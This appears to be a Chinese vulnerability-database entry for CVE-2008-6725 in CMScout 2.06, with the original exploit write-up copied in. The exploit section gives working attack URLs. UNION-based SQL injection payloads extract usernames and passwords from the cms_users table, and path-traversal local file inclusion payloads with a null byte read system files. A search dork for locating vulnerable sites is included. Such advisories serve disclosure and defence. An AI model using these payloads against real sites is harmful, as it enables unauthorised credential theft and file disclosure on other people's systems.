CMScout 本地文件包含和SQL注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1117173 漏洞类型 SQL注入
发布时间 2008-12-30 更新时间 2009-04-17
CVE编号 CVE-2008-6725 CNNVD-ID CNNVD-200904-349
漏洞平台 PHP CVSS评分 6.0
|漏洞来源
https://www.exploit-db.com/exploits/7625
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200904-349
|漏洞详情
CMScout2.06版本存在多个SQL注入漏洞。远程认证用户可以提交一个id参数到mythings页中的index.php和admin.php中的用户页,执行任意的SQL指令。
|漏洞EXP
#############################################################################################
[+] CMScout 2.06 Remote SQL Injection/Local File Inclusion
[+] Discovered By SirGod
[+] Visit : www.mortal-team.org
[+] Visit : www.h4cky0u.org
[+] Greetz : All my friends
#############################################################################################

[+] Script homepage : http://www.cmscout.co.za/
[+] Dork : Powered by CMScout (c)2005 CMScout Group

[+] Remote SQL Injection


-------------------------------------------------------------------------------
1)

- You must be logged in as normal user.Add a download and go to :

 Example :

  http://[target]/[path]/index.php?page=mythings&cat=downloads&action=edit&id=null union all select 1,2,3,4,concat_ws(0x3a,uname,passwd),6,7,8,9,10,11 from cms_users--


--------------------------------------------------------------------------------
2)

- You must be logged in as administrator .

 Example :

  http://[target]/[path]/admin.php?page=users&subpage=users_view&id=null union all select 1,2,concat_ws(0x3a,uname,passwd),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40 from cms_users--

---------------------------------------------------------------------------------

[+] Local File Inclusion

---------------------------------------------------------------------------------
1)

- Vulnerable code in admin.php :

++++++++++++++++++++++++++++++++++++++++++++++++++++++

require_once ("{$bit}includes/error_handling.php");

++++++++++++++++++++++++++++++++++++++++++++++++++++++

Example :

http://[target]/[path]/admin.php?bit=../../../../../boot.ini%00

----------------------------------------------------------------------------------
2)

- Vunerable code in index.php :

++++++++++++++++++++++++++++++++++++++++++++++++++++++

require_once ("{$bit}includes/error_handling.php");

++++++++++++++++++++++++++++++++++++++++++++++++++++++

Example :

http://[target]/[path]/index.php?bit=../../../../boot.ini%00

----------------------------------------------------------------------------------


#############################################################################################

# milw0rm.com [2008-12-30]
|参考资料

来源:XF
名称:cmscout-index-admin-sql-injection(47659)
链接:http://xforce.iss.net/xforce/xfdb/47659
来源:BID
名称:33068
链接:http://www.securityfocus.com/bid/33068
来源:MILW0RM
名称:7625
链接:http://www.milw0rm.com/exploits/7625
来源:www.cmscout.co.za
链接:http://www.cmscout.co.za/index.php?page=news&id=30
来源:SECUNIA
名称:33375
链接:http://secunia.com/advisories/33375
来源:OSVDB
名称:51118
链接:http://osvdb.org/51118